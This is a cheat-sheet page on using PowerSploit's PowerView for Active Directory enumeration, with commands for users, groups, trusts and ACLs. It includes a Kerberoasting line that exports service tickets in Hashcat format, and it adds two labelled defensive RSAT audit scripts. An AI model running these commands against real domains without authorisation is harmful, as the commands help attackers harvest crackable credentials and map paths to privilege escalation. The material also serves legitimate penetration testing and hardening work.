PowerSploit

active_directory_enumeration_attacks

PowerSploit (11.5k ⭐, 2017 🪦) is the latest version of PowerTools and PowerUp, which have themselves been dead since 2014/2015.


PowerView

PowerView is a module that is part of PowerSploit.

PS> Import-Module .\PowerView.ps1

PowerView — Domain Enumeration


Get information on the domain:

PS> Get-DomainSID
PS> Get-DomainPolicy
PS> Get-DomainUser -Identity username
PS> Get-DomainGroup -Identity "XXX" | select memberof
PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
PS> Get-DomainTrustMapping
PS> Test-AdminAccess -ComputerName TARGET_HOST
PS> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
PS> Get-DomainUser cn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes # encryption scheme
PS> Get-DomainUser -Identity cn | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\xxx.csv -NoTypeInformation
PS> Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*XXX*'} | select samaccountname,useraccountcontrol
PS> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
PS> Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

📚 You can explicitly query a domain using -Domain example.com.
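The switches above (-SPN, -PreauthNotRequired, -UACFilter, -Recurse) are wrappers around LDAP filters on userAccountControl and group membership. The script below is an added example, not PowerSploit code: it performs the same audit with the built-in ActiveDirectory (RSAT) module, so a defender can review the exposure PowerView would reveal without dropping PowerView on a host. It assumes RSAT is installed and the caller can read the domain; the function and variable names are the example's own.

```powershell
# Added example (not from PowerSploit): reproduce PowerView's user-account checks with the
# built-in ActiveDirectory module. Assumes RSAT is installed and the caller can read the domain.
Import-Module ActiveDirectory

# userAccountControl bit values behind PowerView's -UACFilter / -PreauthNotRequired switches
$UAC = @{
    PASSWD_NOTREQD       = 0x0020
    DONT_EXPIRE_PASSWORD = 0x10000
    DONT_REQ_PREAUTH     = 0x400000
}

# LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803) tests a single flag bit server-side
function Get-UacFlagFilter {
    param([int]$Flag)
    "(userAccountControl:1.2.840.113556.1.4.803:=$Flag)"
}

function Get-AccountExposureReport {
    param([string]$Server = $env:USERDNSDOMAIN)   # equivalent of PowerView's -Domain

    $props = 'samAccountName', 'userAccountControl', 'servicePrincipalName', 'msDS-SupportedEncryptionTypes'

    # Accounts with an SPN (what Get-DomainUser -SPN returns); krbtgt is excluded as noise
    $spnUsers   = Get-ADUser -Server $Server -LDAPFilter '(&(servicePrincipalName=*)(!(samAccountName=krbtgt)))' -Properties $props
    # Accounts with DONT_REQ_PREAUTH set (Get-DomainUser -PreauthNotRequired)
    $noPreauth  = Get-ADUser -Server $Server -LDAPFilter (Get-UacFlagFilter $UAC.DONT_REQ_PREAUTH) -Properties $props
    # Accounts with PASSWD_NOTREQD set (Get-DomainUser -UACFilter PASSWD_NOTREQD)
    $noPassword = Get-ADUser -Server $Server -LDAPFilter (Get-UacFlagFilter $UAC.PASSWD_NOTREQD) -Properties $props
    # Recursive Domain Admins membership (Get-DomainGroupMember -Identity "Domain Admins" -Recurse)
    $domainAdmins = Get-ADGroupMember -Server $Server -Identity 'Domain Admins' -Recursive

    [PSCustomObject]@{
        SpnUsers        = $spnUsers   | Select-Object samAccountName, servicePrincipalName, 'msDS-SupportedEncryptionTypes'
        NoPreauthUsers  = $noPreauth  | Select-Object samAccountName, userAccountControl
        PasswordNotReqd = $noPassword | Select-Object samAccountName, userAccountControl
        DomainAdmins    = $domainAdmins | Select-Object samAccountName, objectClass
        # msDS-SupportedEncryptionTypes unset, or without the AES bits (0x8 AES128, 0x10 AES256),
        # means the account's service tickets are issued with RC4; these are the ones to fix first
        SpnUsersRc4Only = $spnUsers | Where-Object {
            -not $_.'msDS-SupportedEncryptionTypes' -or (($_.'msDS-SupportedEncryptionTypes' -band 0x18) -eq 0)
        } | Select-Object samAccountName
    }
}

$report = Get-AccountExposureReport
'--- SPN accounts ---';            $report.SpnUsers        | Format-Table -AutoSize
'--- SPN accounts, RC4 only ---';  $report.SpnUsersRc4Only | Format-Table -AutoSize
'--- Pre-auth not required ---';   $report.NoPreauthUsers  | Format-Table -AutoSize
'--- Password not required ---';   $report.PasswordNotReqd | Format-Table -AutoSize
'--- Domain Admins (recursive) ---'; $report.DomainAdmins  | Format-Table -AutoSize
```

Each list maps to one line of the cheat sheet; the RC4-only view goes a step further than the page's command by decoding msDS-SupportedEncryptionTypes, which is what makes a service account's tickets cheap to crack and therefore the first thing to remediate (set a strong password or a gMSA, and enable AES on the account).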

PowerView — Trust Relationships


PS> Get-DomainTrust
PS> Get-DomainTrustMapping
PS> Get-DomainUser -Domain dev.example.com | select SamAccountName

PowerView — ACE-related commands


PS> Find-InterestingDomainAcl
PS> $sid = Convert-NameToSid username
PS> $username = Convert-SidToName $sid
PS> Get-DomainObjectACL -Identity cn | ? {$_.SecurityIdentifier -eq $sid}
PS> Get-DomainObjectACL -ResolveGUIDs -Identity cn | ? {$_.SecurityIdentifier -eq $sid}
PS> Get-ObjectAcl "DC=example,DC=com" -ResolveGUIDs
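Find-InterestingDomainAcl and Get-DomainObjectACL -ResolveGUIDs read the DACL of an AD object, keep the ACEs that grant control-type rights, and translate the rights GUIDs into names. The script below is an added example, not PowerSploit code, that does the same review with the AD: PSDrive and schema lookups from the ActiveDirectory module, so an administrator can list ACEs worth reviewing on the domain head without PowerView. It assumes RSAT is installed; the function names and the list of expected principals are the example's own assumptions and should be adjusted to the environment.

```powershell
# Added example (not from PowerSploit): list ACEs on an AD object that grant control-type
# rights to principals other than the expected administrative ones, resolving rights GUIDs
# to names the way -ResolveGUIDs does. Assumes the ActiveDirectory (RSAT) module is present.
Import-Module ActiveDirectory

# Rights that let a principal change or take over the object
$interestingRights = 'GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner', 'WriteProperty', 'ExtendedRight', 'Self'
# Principals that legitimately hold broad rights; adjust for the environment (assumed list)
$expectedPrincipals = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                      "$env:USERDOMAIN\Domain Admins", "$env:USERDOMAIN\Enterprise Admins"

# Translate an ObjectType GUID via the Extended-Rights container, then the schema (schemaIDGUID)
function Resolve-RightsGuid {
    param([guid]$Guid)
    $rootDse = Get-ADRootDSE
    $right = Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" `
                          -LDAPFilter "(rightsGuid=$Guid)" -Properties displayName | Select-Object -First 1
    if ($right) { return $right.displayName }
    # schemaIDGUID is a binary attribute, so the filter needs the escaped byte form
    $escaped = ($Guid.ToByteArray() | ForEach-Object { '\' + $_.ToString('x2') }) -join ''
    $attr = Get-ADObject -SearchBase $rootDse.schemaNamingContext `
                         -LDAPFilter "(schemaIDGUID=$escaped)" -Properties lDAPDisplayName | Select-Object -First 1
    if ($attr) { return $attr.lDAPDisplayName }
    return $null
}

function Get-InterestingObjectAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # ActiveDirectoryRights is a flags enum; its string form is a comma-separated list
        $rights = $ace.ActiveDirectoryRights.ToString() -split ',\s*'
        if (-not ($rights | Where-Object { $interestingRights -contains $_ })) { continue }
        if ($expectedPrincipals -contains $ace.IdentityReference.Value) { continue }

        $objectTypeName = $null
        if ($ace.ObjectType -ne [guid]::Empty) { $objectTypeName = Resolve-RightsGuid $ace.ObjectType }

        [PSCustomObject]@{
            Object     = $DistinguishedName
            Principal  = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights
            ObjectType = if ($objectTypeName) { $objectTypeName } else { $ace.ObjectType }
            Inherited  = $ace.IsInherited
        }
    }
}

# Review the domain head (same target as Get-ObjectAcl "DC=example,DC=com" -ResolveGUIDs)
$domainDn = (Get-ADDomain).DistinguishedName
Get-InterestingObjectAce -DistinguishedName $domainDn | Format-Table -AutoSize
```

Non-inherited ACEs for principals outside the expected list are the ones to investigate: they are usually delegation that was never cleaned up, and removing them is the fix, not hiding the object. Run the same function against sensitive OUs and the AdminSDHolder object to cover the places where such rights matter most.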

PowerView — PS1 Alternatives

There is a C# port called SharpView (0.9k ⭐, 2018 🪦).

PS> .\SharpView.exe Get-DomainUser -Identity username

There is a Python port called powerview.py (0.3k ⭐).